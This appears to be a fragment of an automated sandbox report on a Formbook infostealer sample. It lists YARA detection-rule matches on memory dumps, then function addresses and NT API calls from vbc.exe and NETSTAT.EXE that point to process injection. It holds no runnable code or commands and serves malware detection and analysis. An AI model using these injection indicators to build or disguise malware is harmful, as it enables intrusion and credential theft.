          Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004030FB
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004047D34_2_004047D3
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004061D44_2_004061D4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_730559904_2_73055990
          Source: C:\Users\Public\vbc.exeCode function: 4_2_7305DFF24_2_7305DFF2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73066A2B4_2_73066A2B
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73066A3A4_2_73066A3A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73059E5E4_2_73059E5E
          Source: C:\Users\Public\vbc.exeCode function: 4_2_7305F27E4_2_7305F27E
          Source: C:\Users\Public\vbc.exeCode function: 4_2_730606C94_2_730606C9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_7305EAD64_2_7305EAD6
          Source: C:\Users\Public\vbc.exeCode function: 4_2_7305E5644_2_7305E564
          Source: C:\Users\Public\vbc.exeCode function: 4_2_730559D44_2_730559D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C0F75_2_0041C0F7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C9AF5_2_0041C9AF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C7C5_2_00408C7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BC195_2_0041BC19
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C805_2_00408C80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C5C55_2_0041C5C5
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BEF95_2_0041BEF9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CFD65_2_0041CFD6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CFD95_2_0041CFD9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DD06D5_2_007DD06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077905A5_2_0077905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007630405_2_00763040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078D0055_2_0078D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075E0C65_2_0075E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075E2E95_2_0075E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008012385_2_00801238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AA37B5_2_007AA37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007673535_2_00767353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008063BF5_2_008063BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007623055_2_00762305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007863DB5_2_007863DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075F3CF5_2_0075F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079D47D5_2_0079D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E443E5_2_007E443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007954855_2_00795485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007714895_2_00771489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A65405_2_007A6540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076351F5_2_0076351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077C5F05_2_0077C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E05E35_2_007E05E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AA6345_2_007AA634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008026225_2_00802622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076E6C15_2_0076E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007646805_2_00764680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007957C35_2_007957C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076C7BC5_2_0076C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E579A5_2_007E579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078286D5_2_0078286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076C85C5_2_0076C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FF8EE5_2_007FF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DF8C45_2_007DF8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0080098E5_2_0080098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E59555_2_007E5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E394B5_2_007E394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007769FE5_2_007769FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007629B25_2_007629B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00813A835_2_00813A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0080CBA45_2_0080CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00787B005_2_00787B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FBD75_2_0075FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007EDBDA5_2_007EDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E6BCB5_2_007E6BCB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076CD5B5_2_0076CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00790D3B5_2_00790D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FFDDD5_2_007FFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077EE4C5_2_0077EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00792E2F5_2_00792E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078DF7C5_2_0078DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00770F3F5_2_00770F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007D2FDC5_2_007D2FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FCFB15_2_007FCFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004010305_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C0F75_1_0041C0F7
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C5C55_1_0041C5C5
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C9AF5_1_0041C9AF
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C7C5_1_00408C7C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BC195_1_0041BC19
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C805_1_00408C80
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D875_1_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D905_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BEF95_1_0041BEF9
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CFD65_1_0041CFD6
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CFD95_1_0041CFD9
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB05_1_00402FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023A12387_2_023A1238
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022FE2E97_2_022FE2E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023023057_2_02302305
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0234A37B7_2_0234A37B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023073537_2_02307353
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023A63BF7_2_023A63BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022FF3CF7_2_022FF3CF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023263DB7_2_023263DB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0232D0057_2_0232D005
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0231905A7_2_0231905A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023030407_2_02303040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022FE0C67_2_022FE0C6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0234A6347_2_0234A634
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023A26227_2_023A2622
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023046807_2_02304680
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0230E6C17_2_0230E6C1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0230C7BC7_2_0230C7BC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0238579A7_2_0238579A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023357C37_2_023357C3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0238443E7_2_0238443E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0233D47D7_2_0233D47D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023354857_2_02335485
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023114897_2_02311489
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0230351F7_2_0230351F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023465407_2_02346540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0231C5F07_2_0231C5F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023B3A837_2_023B3A83
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02327B007_2_02327B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023ACBA47_2_023ACBA4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0238DBDA7_2_0238DBDA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022FFBD77_2_022FFBD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0232286D7_2_0232286D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0230C85C7_2_0230C85C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0239F8EE7_2_0239F8EE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023859557_2_02385955
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0238394B7_2_0238394B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023029B27_2_023029B2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023A098E7_2_023A098E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023169FE7_2_023169FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02332E2F7_2_02332E2F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0231EE4C7_2_0231EE4C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02310F3F7_2_02310F3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0232DF7C7_2_0232DF7C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0239CFB17_2_0239CFB1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02372FDC7_2_02372FDC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02330D3B7_2_02330D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0230CD5B7_2_0230CD5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0239FDDD7_2_0239FDDD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009C9AF7_2_0009C9AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00088C7C7_2_00088C7C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00088C807_2_00088C80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00082D877_2_00082D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00082D907_2_00082D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00082FB07_2_00082FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009CFD97_2_0009CFD9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02343F92 appears 132 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0234373B appears 244 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 022FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0236F970 appears 84 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 022FDF5C appears 119 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A390 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007A3F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007CF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0075DF5C appears 123 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0075E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007A373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A4C0 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185E0 NtCreateFile,5_2_004185E0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418690 NtReadFile,5_2_00418690
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418710 NtClose,5_2_00418710
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,5_2_004187C0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041868A NtReadFile,5_2_0041868A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041870A NtClose,5_2_0041870A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187BB NtAllocateVirtualMemory,5_2_004187BB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750078 NtResumeThread,LdrInitializeThunk,5_2_00750078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00750048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007500C4 NtCreateFile,LdrInitializeThunk,5_2_007500C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007507AC NtCreateMutant,LdrInitializeThunk,5_2_007507AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F900 NtReadFile,LdrInitializeThunk,5_2_0074F900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F9F0 NtClose,LdrInitializeThunk,5_2_0074F9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0074FAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0074FAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0074FB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0074FBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0074FC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0074FC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0074FDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FD8C NtDelayExecution,LdrInitializeThunk,5_2_0074FD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0074FED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0074FEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FFB4 NtCreateSection,LdrInitializeThunk,5_2_0074FFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750060 NtQuerySection,5_2_00750060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007510D0 NtOpenProcessToken,5_2_007510D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751148 NtOpenThread,5_2_00751148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075010C NtOpenDirectoryObject,5_2_0075010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007501D4 NtSetValueKey,5_2_007501D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F8CC NtWaitForSingleObject,5_2_0074F8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751930 NtSetContextThread,5_2_00751930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F938 NtWriteFile,5_2_0074F938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FA50 NtEnumerateValueKey,5_2_0074FA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FA20 NtQueryInformationFile,5_2_0074FA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAB8 NtQueryValueKey,5_2_0074FAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FB50 NtCreateKey,5_2_0074FB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FBE8 NtQueryVirtualMemory,5_2_0074FBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750C40 NtGetContextThread,5_2_00750C40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC48 NtSetInformationFile,5_2_0074FC48
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC30 NtOpenProcess,5_2_0074FC30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FD5C NtEnumerateKey,5_2_0074FD5C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751D80 NtSuspendThread,5_2_00751D80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FE24 NtWriteVirtualMemory,5_2_0074FE24
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FF34 NtQueueApcThread,5_2_0074FF34
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FFFC NtCreateProcessEx,5_2_0074FFFC
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004185E0 NtCreateFile,5_1_004185E0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418690 NtReadFile,5_1_00418690
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418710 NtClose,5_1_00418710
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004187C0 NtAllocateVirtualMemory,5_1_004187C0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041868A NtReadFile,5_1_0041868A
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041870A NtClose,5_1_0041870A
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004187BB NtAllocateVirtualMemory,5_1_004187BB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F00C4 NtCreateFile,LdrInitializeThunk,7_2_022F00C4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F07AC NtCreateMutant,LdrInitializeThunk,7_2_022F07AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFAB8 NtQueryValueKey,LdrInitializeThunk,7_2_022EFAB8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_022EFAE8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_022EFAD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_022EFB68
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFB50 NtCreateKey,LdrInitializeThunk,7_2_022EFB50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_022EFBB8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EF900 NtReadFile,LdrInitializeThunk,7_2_022EF900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EF9F0 NtClose,LdrInitializeThunk,7_2_022EF9F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_022EFED0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFFB4 NtCreateSection,LdrInitializeThunk,7_2_022EFFB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_022EFC60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFD8C NtDelayExecution,LdrInitializeThunk,7_2_022EFD8C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_022EFDC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F0060 NtQuerySection,7_2_022F0060
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F0078 NtResumeThread,7_2_022F0078
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F0048 NtProtectVirtualMemory,7_2_022F0048
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F10D0 NtOpenProcessToken,7_2_022F10D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F010C NtOpenDirectoryObject,7_2_022F010C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F1148 NtOpenThread,7_2_022F1148
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F01D4 NtSetValueKey,7_2_022F01D4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFA20 NtQueryInformationFile,7_2_022EFA20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFA50 NtEnumerateValueKey,7_2_022EFA50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFBE8 NtQueryVirtualMemory,7_2_022EFBE8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EF8CC NtWaitForSingleObject,7_2_022EF8CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EF938 NtWriteFile,7_2_022EF938
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F1930 NtSetContextThread,7_2_022F1930
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFE24 NtWriteVirtualMemory,7_2_022EFE24
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFEA0 NtReadVirtualMemory,7_2_022EFEA0
